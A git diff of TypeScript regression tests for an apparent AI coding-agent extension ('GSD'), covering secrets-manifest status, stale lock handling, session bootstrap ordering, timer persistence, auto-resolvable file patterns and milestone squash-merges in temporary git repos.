-    const pendingMatches = updatedContent.match(/\*\*Status:\*\* pending/g);
-    assert.strictEqual(pendingMatches?.length, 1, 'one entry (existing-in-env) retains pending on disk');
-
-    // (e) Verify getManifestStatus now shows no pending
-    const statusAfter = await getManifestStatus(tmp, 'M001');
-    assert.notStrictEqual(statusAfter, null);
-    assert.deepStrictEqual(statusAfter!.pending, [], 'no pending keys after collection');
-  } finally {
-    delete process.env.GSD_GATE_TEST_EXISTING;
-    if (savedA !== undefined) process.env.GSD_GATE_TEST_EXISTING = savedA;
-    delete process.env.GSD_GATE_TEST_PEND_A;
-    delete process.env.GSD_GATE_TEST_PEND_B;
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-// ─── Scenario 3: No pending keys — all collected or in env ──────────────────
-
-test('secrets gate: no pending keys — getManifestStatus shows pending.length === 0', async () => {
-  const tmp = makeTempDir('gate-no-pending');
-  const savedKey = process.env.GSD_GATE_TEST_ENVKEY;
-  try {
-    process.env.GSD_GATE_TEST_ENVKEY = 'some-value';
-
-    writeManifest(tmp, `# Secrets Manifest
-
-**Milestone:** M001
-**Generated:** 2025-06-20T10:00:00Z
-
-### ALREADY_COLLECTED
-
-**Service:** ServiceX
-**Status:** collected
-**Destination:** dotenv
-
-1. Was collected previously
-
-### ALREADY_SKIPPED
-
-**Service:** ServiceY
-**Status:** skipped
-**Destination:** dotenv
-
-1. Not needed
-
-### GSD_GATE_TEST_ENVKEY
-
-**Service:** ServiceZ
-**Status:** pending
-**Destination:** dotenv
-
-1. In env already
-`);
-
-    const result = await getManifestStatus(tmp, 'M001');
-    assert.notStrictEqual(result, null, 'manifest should exist');
-    assert.deepStrictEqual(result!.pending, [], 'no pending keys — gate would skip');
-    assert.deepStrictEqual(result!.collected, ['ALREADY_COLLECTED']);
-    assert.deepStrictEqual(result!.skipped, ['ALREADY_SKIPPED']);
-    assert.deepStrictEqual(result!.existing, ['GSD_GATE_TEST_ENVKEY']);
-  } finally {
-    delete process.env.GSD_GATE_TEST_ENVKEY;
-    if (savedKey !== undefined) process.env.GSD_GATE_TEST_ENVKEY = savedKey;
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
diff --git a/src/resources/extensions/gsd/tests/auto-stale-lock-self-kill.test.ts b/src/resources/extensions/gsd/tests/auto-stale-lock-self-kill.test.ts
new file mode 100644
index 000000000..08f1c8f29
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-stale-lock-self-kill.test.ts
@@ -0,0 +1,87 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { mkdirSync, mkdtempSync, writeFileSync, existsSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { writeLock, readCrashLock, clearLock } from "../crash-recovery.ts";
+import { checkRemoteAutoSession, stopAutoRemote } from "../auto.ts";
+
+function makeTmpProject(): string {
+  const dir = mkdtempSync(join(tmpdir(), "gsd-stale-lock-test-"));
+  mkdirSync(join(dir, ".gsd"), { recursive: true });
+  return dir;
+}
+
+// ─── checkRemoteAutoSession: own-PID filtering (#2730) ───────────────────
+
+test("#2730: checkRemoteAutoSession returns { running: false } when lock PID matches current process", (t) => {
+  const dir = makeTmpProject();
+  t.after(() => rmSync(dir, { recursive: true, force: true }));
+
+  // Write a lock with the current process PID — simulates a stale lock
+  // left behind after step-mode exit without full cleanup.
+  writeLock(dir, "execute-task", "M001/S01/T01");
+
+  const lock = readCrashLock(dir);
+  assert.ok(lock, "lock file should exist");
+  assert.equal(lock!.pid, process.pid, "lock should have our PID");
+
+  const result = checkRemoteAutoSession(dir);
+  assert.equal(result.running, false, "own PID must not be treated as a remote session");
+});
+
+test("#2730: checkRemoteAutoSession still detects a genuine remote session (different PID)", (t) => {
+  const dir = makeTmpProject();
+  t.after(() => rmSync(dir, { recursive: true, force: true }));
+
+  // Use parent PID — guaranteed alive, guaranteed not our PID.
+  const remotePid = process.ppid;
+  const lockData = {
+    pid: remotePid,
+    startedAt: new Date().toISOString(),
+    unitType: "execute-task",
+    unitId: "M001/S01/T02",
+    unitStartedAt: new Date().toISOString(),
+  };
+  writeFileSync(join(dir, ".gsd", "auto.lock"), JSON.stringify(lockData, null, 2));
+
+  const result = checkRemoteAutoSession(dir);
+  assert.equal(result.running, true, "different live PID should be detected as running");
+  assert.equal(result.pid, remotePid);
+});
+
+// ─── stopAutoRemote: self-kill prevention (#2730) ────────────────────────
+
+test("#2730: stopAutoRemote does not send SIGTERM when lock PID matches current process", (t) => {
+  const dir = makeTmpProject();
+  t.after(() => rmSync(dir, { recursive: true, force: true }));
+
+  // Write a lock with our own PID
+  writeLock(dir, "execute-task", "M001/S01/T01");
+
+  const result = stopAutoRemote(dir);
+  assert.equal(result.found, false, "own PID must not be signalled");
+
+  // The lock should be cleared as part of the self-detection cleanup
+  assert.ok(!existsSync(join(dir, ".gsd", "auto.lock")), "stale self-lock should be cleared");
+});
+
+test("#2730: stopAutoRemote clears stale lock from dead remote process without error", (t) => {
+  const dir = makeTmpProject();
+  t.after(() => rmSync(dir, { recursive: true, force: true }));
+
+  // Simulate a stale lock from a process that no longer exists
+  const lockData = {
+    pid: 9999999,
+    startedAt: "2026-03-01T00:00:00Z",
+    unitType: "plan-slice",
+    unitId: "M001/S02",
+    unitStartedAt: "2026-03-01T00:05:00Z",
+  };
+  writeFileSync(join(dir, ".gsd", "auto.lock"), JSON.stringify(lockData, null, 2));
+
+  const result = stopAutoRemote(dir);
+  assert.equal(result.found, false, "dead remote PID should not be reported as found");
+  assert.ok(!existsSync(join(dir, ".gsd", "auto.lock")), "stale lock should be cleaned up");
+});
diff --git a/src/resources/extensions/gsd/tests/auto-start-cold-db-bootstrap.test.ts b/src/resources/extensions/gsd/tests/auto-start-cold-db-bootstrap.test.ts
new file mode 100644
index 000000000..c43636baa
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-start-cold-db-bootstrap.test.ts
@@ -0,0 +1,37 @@
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+import { createTestContext } from "./test-helpers.ts";
+
+const { assertTrue, report } = createTestContext();
+
+const srcPath = join(import.meta.dirname, "..", "auto-start.ts");
+const src = readFileSync(srcPath, "utf-8");
+
+console.log("\n=== #2841: cold DB opened before initial deriveState ===");
+
+const helperIdx = src.indexOf("async function openProjectDbIfPresent");
+assertTrue(helperIdx >= 0, "auto-start.ts defines a helper for pre-derive DB open (#2841)");
+
+const helperRegion = helperIdx >= 0 ? src.slice(helperIdx, helperIdx + 500) : "";
+assertTrue(
+  helperRegion.includes("resolveProjectRootDbPath(basePath)"),
+  "pre-derive DB helper resolves the project-root DB path (#2841)",
+);
+assertTrue(
+  helperRegion.includes("openDatabase(gsdDbPath)"),
+  "pre-derive DB helper opens the resolved DB path (#2841)",
+);
+
+const firstDeriveIdx = src.indexOf("let state = await deriveState(base);");
+assertTrue(firstDeriveIdx > 0, "auto-start.ts has the initial deriveState(base) call");
+
+const preDeriveRegion = firstDeriveIdx > 0 ? src.slice(0, firstDeriveIdx) : "";
+const preDeriveOpenIdx = preDeriveRegion.lastIndexOf("await openProjectDbIfPresent(base);");
+
+assertTrue(
+  preDeriveOpenIdx > 0,
+  "bootstrapAutoSession opens the DB before the first deriveState(base) call (#2841)",
+);
+
+report();
diff --git a/src/resources/extensions/gsd/tests/auto-start-model-capture.test.ts b/src/resources/extensions/gsd/tests/auto-start-model-capture.test.ts
new file mode 100644
index 000000000..2ffb5bf96
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-start-model-capture.test.ts
@@ -0,0 +1,48 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const sourcePath = join(import.meta.dirname, "..", "auto-start.ts");
+const source = readFileSync(sourcePath, "utf-8");
+
+test("bootstrapAutoSession snapshots ctx.model before guided-flow entry (#2829)", () => {
+  // #3517 changed the snapshot to prefer GSD preferences, but the ordering
+  // guarantee still holds: the snapshot must be built before guided-flow.
+  const snapshotIdx = source.indexOf("const startModelSnapshot = preferredModel");
+  assert.ok(snapshotIdx > -1, "auto-start.ts should snapshot model at bootstrap start");
+
+  const firstDiscussIdx = source.indexOf('await showSmartEntry(ctx, pi, base, { step: requestedStepMode });');
+  assert.ok(firstDiscussIdx > -1, "auto-start.ts should route through showSmartEntry during guided flow");
+
+  assert.ok(
+    snapshotIdx < firstDiscussIdx,
+    "auto-start.ts must capture the start model before guided-flow can mutate ctx.model",
+  );
+});
+
+test("bootstrapAutoSession restores autoModeStartModel from the early snapshot (#2829)", () => {
+  const assignmentIdx = source.indexOf("s.autoModeStartModel = {");
+  assert.ok(assignmentIdx > -1, "auto-start.ts should assign autoModeStartModel");
+
+  const snapshotRefIdx = source.indexOf("provider: startModelSnapshot.provider", assignmentIdx);
+  assert.ok(snapshotRefIdx > -1, "autoModeStartModel should be restored from startModelSnapshot");
+});
+
+test("bootstrapAutoSession prefers GSD PREFERENCES.md over settings.json for start model (#3517)", () => {
+  // resolveDefaultSessionModel() should be called before the snapshot is built
+  const preferredIdx = source.indexOf("const preferredModel = resolveDefaultSessionModel(");
+  assert.ok(preferredIdx > -1, "auto-start.ts should call resolveDefaultSessionModel()");
+
+  // Session provider should be passed for bare model ID resolution
+  const withProviderIdx = source.indexOf("resolveDefaultSessionModel(ctx.model?.provider)");
+  assert.ok(withProviderIdx > -1, "auto-start.ts should pass ctx.model?.provider for bare ID resolution");
+
+  const snapshotIdx = source.indexOf("const startModelSnapshot = preferredModel");
+  assert.ok(snapshotIdx > -1, "startModelSnapshot should use preferredModel when available");
+
+  assert.ok(
+    preferredIdx < snapshotIdx,
+    "resolveDefaultSessionModel() must be called before building startModelSnapshot",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/auto-start-needs-discussion.test.ts b/src/resources/extensions/gsd/tests/auto-start-needs-discussion.test.ts
index 7f5bc2a59..a14c5a539 100644
--- a/src/resources/extensions/gsd/tests/auto-start-needs-discussion.test.ts
+++ b/src/resources/extensions/gsd/tests/auto-start-needs-discussion.test.ts
@@ -22,6 +22,8 @@
  *   - The !hasSurvivorBranch block has a needs-discussion handler
  */
 
+import { describe, test, afterEach } from "node:test";
+import assert from "node:assert/strict";
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
@@ -30,9 +32,6 @@ import { dirname } from "node:path";
 
 import { deriveState } from "../state.ts";
 import { invalidateAllCaches } from "../cache.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ─── Fixture Helpers ─────────────────────────────────────────────────────────
 
@@ -76,52 +75,46 @@ function readAutoStartSource(): string {
 // Tests
 // ═══════════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
+describe("auto-start-needs-discussion (#1726)", () => {
 
-  // ─── 1. deriveState returns needs-discussion for CONTEXT-DRAFT only ────────
-  console.log("\n=== 1. CONTEXT-DRAFT.md only → needs-discussion phase ===");
-  {
+  test("1. CONTEXT-DRAFT.md only → needs-discussion phase", async () => {
     const base = createBase();
     try {
       writeContextDraft(base, "M001", "# Draft\nSeed discussion.");
       invalidateAllCaches();
       const state = await deriveState(base);
-      assertEq(state.phase, "needs-discussion",
+      assert.strictEqual(state.phase, "needs-discussion",
         "milestone with only CONTEXT-DRAFT should be needs-discussion");
-      assertTrue(!!state.activeMilestone,
+      assert.ok(!!state.activeMilestone,
         "activeMilestone should be set for needs-discussion");
-      assertEq(state.activeMilestone?.id, "M001",
+      assert.strictEqual(state.activeMilestone?.id, "M001",
         "activeMilestone.id should be M001");
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 2. Survivor branch filter excludes needs-discussion (#1726 bug 1) ────
-  console.log("\n=== 2. Survivor branch check excludes needs-discussion ===");
-  {
+  test("2. Survivor branch check excludes needs-discussion", () => {
     const source = readAutoStartSource();
 
     // Find the survivor branch check block (Milestone branch recovery comment)
     const survivorBlock = source.match(
       /\/\/ Milestone branch recovery.*?hasSurvivorBranch = nativeBranchExists/s,
     );
-    assertTrue(!!survivorBlock,
+    assert.ok(!!survivorBlock,
       "found survivor branch check block in auto-start.ts");
 
     if (survivorBlock) {
       const block = survivorBlock[0];
       // The condition should only check pre-planning, NOT needs-discussion
-      assertTrue(!block.includes("needs-discussion"),
+      assert.ok(!block.includes("needs-discussion"),
         "survivor branch filter must NOT include needs-discussion phase");
-      assertTrue(block.includes("pre-planning"),
+      assert.ok(block.includes("pre-planning"),
         "survivor branch filter should include pre-planning phase");
     }
-  }
+  });
 
-  // ─── 3. needs-discussion handler exists in !hasSurvivorBranch block (#1726 bug 2)
-  console.log("\n=== 3. needs-discussion handler exists in bootstrap ===");
-  {
+  test("3. needs-discussion handler exists in bootstrap", () => {
     const source = readAutoStartSource();
 
     // After the pre-planning handler, there should be a needs-discussion handler
@@ -129,30 +122,26 @@ async function main(): Promise<void> {
     const needsDiscussionHandler = source.match(
       /if\s*\(state\.phase\s*===\s*"needs-discussion"\)\s*\{[^}]*showSmartEntry/s,
     );
-    assertTrue(!!needsDiscussionHandler,
+    assert.ok(!!needsDiscussionHandler,
       "needs-discussion handler calling showSmartEntry must exist in !hasSurvivorBranch block");
-  }
+  });
 
-  // ─── 4. needs-discussion handler aborts if discussion doesn't promote draft
-  console.log("\n=== 4. needs-discussion handler has abort path ===");
-  {
+  test("4. needs-discussion handler has abort path", () => {
     const source = readAutoStartSource();
 
     // The handler should check postState.phase !== "needs-discussion" and abort
     // if discussion didn't promote the draft
-    assertTrue(
+    assert.ok(
       source.includes('postState.phase !== "needs-discussion"'),
       "needs-discussion handler must check if phase advanced after showSmartEntry",
     );
-    assertTrue(
+    assert.ok(
       source.includes("milestone draft was not promoted"),
       "needs-discussion handler must have abort message when draft not promoted",
     );
-  }
+  });
 
-  // ─── 5. CONTEXT-DRAFT + CONTEXT + ROADMAP → not needs-discussion ──────────
-  console.log("\n=== 5. Full context + roadmap → not needs-discussion ===");
-  {
+  test("5. Full context + roadmap → not needs-discussion", async () => {
     const base = createBase();
     try {
       writeContextDraft(base, "M001", "# Draft\nSeed discussion.");
@@ -161,16 +150,14 @@ async function main(): Promise<void> {
         "# M001: Test\n\n## Slices\n- [ ] **S01: Test Slice** `risk:low` `depends:[]`\n  > After this: works\n");
       invalidateAllCaches();
       const state = await deriveState(base);
-      assertTrue(state.phase !== "needs-discussion",
+      assert.ok(state.phase !== "needs-discussion",
         "milestone with full context + roadmap should NOT be needs-discussion");
     } finally {
       cleanup(base);
     }
-  }
+  });
 
-  // ─── 6. Verify the two bug conditions cannot produce infinite loop ────────
-  console.log("\n=== 6. No infinite loop: needs-discussion always routes to showSmartEntry ===");
-  {
+  test("6. No infinite loop: needs-discussion always routes to showSmartEntry", () => {
     const source = readAutoStartSource();
 
     // Verify needs-discussion does NOT appear in auto-dispatch trigger conditions
@@ -180,7 +167,7 @@ async function main(): Promise<void> {
       /\/\/ Milestone branch recovery.*?let hasSurvivorBranch = false;[\s\S]*?if\s*\([^)]*state\.phase[^)]*\)\s*\{/,
     );
     if (survivorSection) {
-      assertTrue(
+      assert.ok(
         !survivorSection[0].includes("needs-discussion"),
         "survivor branch phase condition must not mention needs-discussion",
       );
@@ -190,19 +177,17 @@ async function main(): Promise<void> {
     const notSurvivorBlock = source.match(
       /if\s*\(!hasSurvivorBranch\)\s*\{([\s\S]*?)\/\/ Unreachable safety check/,
     );
-    assertTrue(!!notSurvivorBlock,
+    assert.ok(!!notSurvivorBlock,
       "found !hasSurvivorBranch block in auto-start.ts");
     if (notSurvivorBlock) {
-      assertTrue(
+      assert.ok(
         notSurvivorBlock[1].includes('"needs-discussion"'),
         "!hasSurvivorBranch block must handle needs-discussion phase",
       );
     }
-  }
+  });
 
-  // ─── 7. Survivor branch + needs-discussion routes to showSmartEntry (#1726) ─
-  console.log("\n=== 7. Survivor branch + needs-discussion routes to showSmartEntry ===");
-  {
+  test("7. Survivor branch + needs-discussion routes to showSmartEntry", () => {
     const source = readAutoStartSource();
 
     // When hasSurvivorBranch is true AND phase is needs-discussion, the code
@@ -210,31 +195,24 @@ async function main(): Promise<void> {
     const survivorNeedsDiscussion = source.match(
       /if\s*\(hasSurvivorBranch\s*&&\s*state\.phase\s*===\s*"needs-discussion"\)\s*\{[^}]*showSmartEntry/s,
     );
-    assertTrue(!!survivorNeedsDiscussion,
+    assert.ok(!!survivorNeedsDiscussion,
       "hasSurvivorBranch && needs-discussion must route to showSmartEntry");
 
     // Verify the handler checks if the discussion succeeded
     const handlerBlock = source.match(
       /if\s*\(hasSurvivorBranch\s*&&\s*state\.phase\s*===\s*"needs-discussion"\)\s*\{([\s\S]*?)\n    \}/,
     );
-    assertTrue(!!handlerBlock,
+    assert.ok(!!handlerBlock,
       "found survivor + needs-discussion handler block");
     if (handlerBlock) {
-      assertTrue(
+      assert.ok(
         handlerBlock[1].includes('postState.phase !== "needs-discussion"'),
         "handler must check if phase advanced after discussion",
       );
-      assertTrue(
+      assert.ok(
         handlerBlock[1].includes("releaseLockAndReturn"),
         "handler must abort if discussion didn't promote draft",
       );
     }
-  }
-
-  report();
-}
-
-main().catch((err) => {
-  console.error(err);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/auto-start-time-persistence.test.ts b/src/resources/extensions/gsd/tests/auto-start-time-persistence.test.ts
new file mode 100644
index 000000000..174a9b651
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-start-time-persistence.test.ts
@@ -0,0 +1,50 @@
+// GSD2 — Verify autoStartTime is persisted in paused-session.json and restored on resume
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+/**
+ * auto-start-time-persistence.test.ts — Ensures autoStartTime survives
+ * cross-session resume via paused-session.json (#3585).
+ *
+ * Source-code regression guards: verify auto.ts saves and restores
+ * autoStartTime so the elapsed timer doesn't vanish after /exit + resume.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const AUTO_TS_PATH = join(__dirname, "..", "auto.ts");
+
+const source = readFileSync(AUTO_TS_PATH, "utf-8");
+
+test("pauseAuto persists autoStartTime in paused-session.json (#3585)", () => {
+  assert.ok(
+    source.includes("autoStartTime: s.autoStartTime"),
+    "pausedMeta must include autoStartTime so the timer survives /exit",
+  );
+});
+
+test("cross-session resume restores autoStartTime from paused-session.json (#3585)", () => {
+  const matches = source.match(/s\.autoStartTime\s*=\s*meta\.autoStartTime/g);
+  assert.ok(
+    matches && matches.length >= 2,
+    "both resume paths (custom workflow + milestone) must restore autoStartTime from meta",
+  );
+});
+
+test("resume path falls back to Date.now() when autoStartTime is missing (#3585)", () => {
+  assert.ok(
+    source.includes("meta.autoStartTime || Date.now()"),
+    "restore should fall back to Date.now() for old paused-session files without autoStartTime",
+  );
+});
+
+test("resume path guards against zero autoStartTime (#3585)", () => {
+  assert.ok(
+    source.includes("if (!s.autoStartTime || s.autoStartTime <= 0) s.autoStartTime = Date.now()"),
+    "resume path must set autoStartTime to Date.now() if still zero after restore",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/auto-worktree-auto-resolve.test.ts b/src/resources/extensions/gsd/tests/auto-worktree-auto-resolve.test.ts
new file mode 100644
index 000000000..5dfaf4812
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/auto-worktree-auto-resolve.test.ts
@@ -0,0 +1,80 @@
+/**
+ * auto-worktree-auto-resolve.test.ts — Unit tests for isSafeToAutoResolve.
+ *
+ * Covers: .gsd/ state files, build artifacts (.tsbuildinfo, .pyc, __pycache__,
+ * .DS_Store, .map), and rejection of real source files.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+
+import {
+  isSafeToAutoResolve,
+  SAFE_AUTO_RESOLVE_PATTERNS,
+} from "../auto-worktree.ts";
+
+describe("isSafeToAutoResolve", () => {
+  // ─── .gsd/ state files ───────────────────────────────────────────────────
+  test("returns true for .gsd/ prefixed paths", () => {
+    assert.ok(isSafeToAutoResolve(".gsd/STATE.md"));
+    assert.ok(isSafeToAutoResolve(".gsd/milestones/M001/CONTEXT.md"));
+    assert.ok(isSafeToAutoResolve(".gsd/gsd.db"));
+  });
+
+  // ─── Build artifact patterns ─────────────────────────────────────────────
+  test("returns true for .tsbuildinfo files", () => {
+    assert.ok(isSafeToAutoResolve("tsconfig.tsbuildinfo"));
+    assert.ok(isSafeToAutoResolve("dist/tsconfig.tsbuildinfo"));
+  });
+
+  test("returns true for .pyc files", () => {
+    assert.ok(isSafeToAutoResolve("module.pyc"));
+    assert.ok(isSafeToAutoResolve("src/utils/helpers.pyc"));
+  });
+
+  test("returns true for __pycache__/ paths", () => {
+    assert.ok(isSafeToAutoResolve("src/__pycache__/module.cpython-311.pyc"));
+    assert.ok(isSafeToAutoResolve("lib/__pycache__/foo.py"));
+  });
+
+  test("returns true for .DS_Store files", () => {
+    assert.ok(isSafeToAutoResolve(".DS_Store"));
+    assert.ok(isSafeToAutoResolve("src/.DS_Store"));
+  });
+
+  test("returns true for .map source map files", () => {
+    assert.ok(isSafeToAutoResolve("dist/index.js.map"));
+    assert.ok(isSafeToAutoResolve("out/bundle.css.map"));
+  });
+
+  // ─── Real source files (should NOT be auto-resolved) ─────────────────────
+  test("returns false for .ts source files", () => {
+    assert.ok(!isSafeToAutoResolve("src/index.ts"));
+    assert.ok(!isSafeToAutoResolve("lib/utils.ts"));
+  });
+
+  test("returns false for .js source files", () => {
+    assert.ok(!isSafeToAutoResolve("src/index.js"));
+    assert.ok(!isSafeToAutoResolve("lib/helpers.js"));
+  });
+
+  test("returns false for .py source files", () => {
+    assert.ok(!isSafeToAutoResolve("src/main.py"));
+    assert.ok(!isSafeToAutoResolve("scripts/deploy.py"));
+  });
+
+  test("returns false for config and data files", () => {
+    assert.ok(!isSafeToAutoResolve("package.json"));
+    assert.ok(!isSafeToAutoResolve("tsconfig.json"));
+    assert.ok(!isSafeToAutoResolve("README.md"));
+  });
+
+  // ─── SAFE_AUTO_RESOLVE_PATTERNS export ────────────────────────────────────
+  test("SAFE_AUTO_RESOLVE_PATTERNS is a non-empty array of RegExp", () => {
+    assert.ok(Array.isArray(SAFE_AUTO_RESOLVE_PATTERNS));
+    assert.ok(SAFE_AUTO_RESOLVE_PATTERNS.length > 0);
+    for (const pattern of SAFE_AUTO_RESOLVE_PATTERNS) {
+      assert.ok(pattern instanceof RegExp);
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/auto-worktree-milestone-merge.test.ts b/src/resources/extensions/gsd/tests/auto-worktree-milestone-merge.test.ts
deleted file mode 100644
index a2bb897f6..000000000
--- a/src/resources/extensions/gsd/tests/auto-worktree-milestone-merge.test.ts
+++ /dev/null
@@ -1,784 +0,0 @@
-/**
- * auto-worktree-milestone-merge.test.ts — Integration tests for mergeMilestoneToMain.
- *
- * Covers: squash-merge topology (one commit on main), rich commit message with
- * slice titles, worktree cleanup, nothing-to-commit edge case, auto-push with
- * bare remote. All tests use real git operations in temp repos.
- */
-
-import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, realpathSync, readFileSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import { execSync } from "node:child_process";
-
-import {
-  createAutoWorktree,
-  mergeMilestoneToMain,
-  getAutoWorktreeOriginalBase,
-} from "../auto-worktree.ts";
-import { getSliceBranchName } from "../worktree.ts";
-import { nativeMergeSquash } from "../native-git-bridge.ts";
-
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
-
-function run(cmd: string, cwd: string): string {
-  return execSync(cmd, { cwd, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" }).trim();
-}
-
-function createTempRepo(): string {
-  const dir = realpathSync(mkdtempSync(join(tmpdir(), "wt-ms-merge-test-")));
-  run("git init", dir);
-  run("git config user.email test@test.com", dir);
-  run("git config user.name Test", dir);
-  writeFileSync(join(dir, "README.md"), "# test\n");
-  mkdirSync(join(dir, ".gsd"), { recursive: true });
-  writeFileSync(join(dir, ".gsd", "STATE.md"), "# State\n");
-  run("git add .", dir);
-  run("git commit -m init", dir);
-  run("git branch -M main", dir);
-  return dir;
-}
-
-/** Minimal roadmap content for mergeMilestoneToMain. */
-function makeRoadmap(milestoneId: string, title: string, slices: Array<{ id: string; title: string }>): string {
-  const sliceLines = slices.map(s => `- [x] **${s.id}: ${s.title}**`).join("\n");
-  return `# ${milestoneId}: ${title}\n\n## Slices\n${sliceLines}\n`;
-}
-
-/** Set up a slice branch on the worktree, add commits, merge it --no-ff to milestone. */
-function addSliceToMilestone(
-  repo: string,
-  wtPath: string,
-  milestoneId: string,
-  sliceId: string,
-  sliceTitle: string,
-  commits: Array<{ file: string; content: string; message: string }>,
-): void {
-  // Detect worktree name for branch naming
-  const normalizedPath = wtPath.replaceAll("\\", "/");
-  const marker = "/.gsd/worktrees/";
-  const idx = normalizedPath.indexOf(marker);
-  const worktreeName = idx !== -1 ? normalizedPath.slice(idx + marker.length).split("/")[0] : null;
-
-  const sliceBranch = getSliceBranchName(milestoneId, sliceId, worktreeName);
-
-  run(`git checkout -b ${sliceBranch}`, wtPath);
-  for (const c of commits) {
-    writeFileSync(join(wtPath, c.file), c.content);
-    run("git add .", wtPath);
-    run(`git commit -m "${c.message}"`, wtPath);
-  }
-  run(`git checkout milestone/${milestoneId}`, wtPath);
-  run(`git merge --no-ff ${sliceBranch} -m "feat(${milestoneId}/${sliceId}): ${sliceTitle}"`, wtPath);
-  // Clean up the slice branch
-  run(`git branch -d ${sliceBranch}`, wtPath);
-}
-
-async function main(): Promise<void> {
-  const savedCwd = process.cwd();
-  const tempDirs: string[] = [];
-
-  function freshRepo(): string {
-    const d = createTempRepo();
-    tempDirs.push(d);
-    return d;
-  }
-
-  try {
-    // ─── Test 1: Basic squash merge — one commit on main ───────────────
-    console.log("\n=== basic squash merge — one commit on main ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M010");
-
-      // Add two slices with multiple commits each
-      addSliceToMilestone(repo, wtPath, "M010", "S01", "Auth module", [
-        { file: "auth.ts", content: "export const auth = true;\n", message: "add auth" },
-        { file: "auth-utils.ts", content: "export const hash = () => {};\n", message: "add auth utils" },
-      ]);
-      addSliceToMilestone(repo, wtPath, "M010", "S02", "User dashboard", [
-        { file: "dashboard.ts", content: "export const dash = true;\n", message: "add dashboard" },
-        { file: "widgets.ts", content: "export const widgets = [];\n", message: "add widgets" },
-      ]);
-
-      const roadmap = makeRoadmap("M010", "User management", [
-        { id: "S01", title: "Auth module" },
-        { id: "S02", title: "User dashboard" },
-      ]);
-
-      const mainLogBefore = run("git log --oneline main", repo);
-      const mainCommitCountBefore = mainLogBefore.split("\n").length;
-
-      const result = mergeMilestoneToMain(repo, "M010", roadmap);
-
-      // Exactly one new commit on main
-      const mainLog = run("git log --oneline main", repo);
-      const mainCommitCountAfter = mainLog.split("\n").length;
-      assertEq(mainCommitCountAfter, mainCommitCountBefore + 1, "exactly one new commit on main");
-
-      // Milestone branch deleted
-      const branches = run("git branch", repo);
-      assertTrue(!branches.includes("milestone/M010"), "milestone branch deleted");
-
-      // Worktree directory removed
-      const worktreeDir = join(repo, ".gsd", "worktrees", "M010");
-      assertTrue(!existsSync(worktreeDir), "worktree directory removed");
-
-      // Module state cleared
-      assertEq(getAutoWorktreeOriginalBase(), null, "originalBase cleared after merge");
-
-      // Files from both slices present on main
-      assertTrue(existsSync(join(repo, "auth.ts")), "auth.ts on main");
-      assertTrue(existsSync(join(repo, "dashboard.ts")), "dashboard.ts on main");
-      assertTrue(existsSync(join(repo, "widgets.ts")), "widgets.ts on main");
-
-      // Result shape
-      assertTrue(result.commitMessage.length > 0, "commitMessage returned");
-      assertTrue(typeof result.pushed === "boolean", "pushed is boolean");
-    }
-
-    // ─── Test 2: Rich commit message format ────────────────────────────
-    console.log("\n=== rich commit message format ===");
-    {
-      const repo = freshRepo();
-      const wtPath = createAutoWorktree(repo, "M020");
-
-      addSliceToMilestone(repo, wtPath, "M020", "S01", "Core API", [
-        { file: "api.ts", content: "export const api = true;\n", message: "add api" },
-      ]);
-      addSliceToMilestone(repo, wtPath, "M020", "S02", "Error handling", [
-        { file: "errors.ts", content: "export class AppError {}\n", message: "add errors" },
-      ]);
-      addSliceToMilestone(repo, wtPath, "M020", "S03", "Logging infra", [
-        { file: "logger.ts", content: "export const log = () => {};\n", message: "add logger" },
-      ]);
-
-      const roadmap = makeRoadmap("M020", "Backend foundation", [
-        { id: "S01", title: "Core API" },
-        { id: "S02", title: "Error handling" },
-        { id: "S03", title: "Logging infra" },
-      ]);
-
-      const result = mergeMilestoneToMain(repo, "M020", roadmap);
-
-      // Subject line: conventional commit format
-      assertMatch(result.commitMessage, /^feat\(M020\):/, "subject has conventional commit prefix");
-      assertTrue(result.commitMessage.includes("Backend foundation"), "subject includes milestone title");
-
-      // Body: slice listing
-      assertTrue(result.commitMessage.includes("- S01: Core API"), "body lists S01");
-      assertTrue(result.commitMessage.includes("- S02: Error handling"), "body lists S02");
-      assertTrue(result.commitMessage.includes("- S03: Logging infra"), "body lists S03");
-
-      // Branch metadata
-      assertTrue(result.commitMessage.includes("Branch: milestone/M020"), "body has branch metadata");
-
-      // Verify the actual git commit message matches
-      const gitMsg = run("git log -1 --format=%B main", repo).trim();
-      assertMatch(gitMsg, /^feat\(M020\):/, "git commit message starts with feat(M020):");
-      assertTrue(gitMsg.includes("- S01: Core API"), "git commit body has S01");
-    }
-
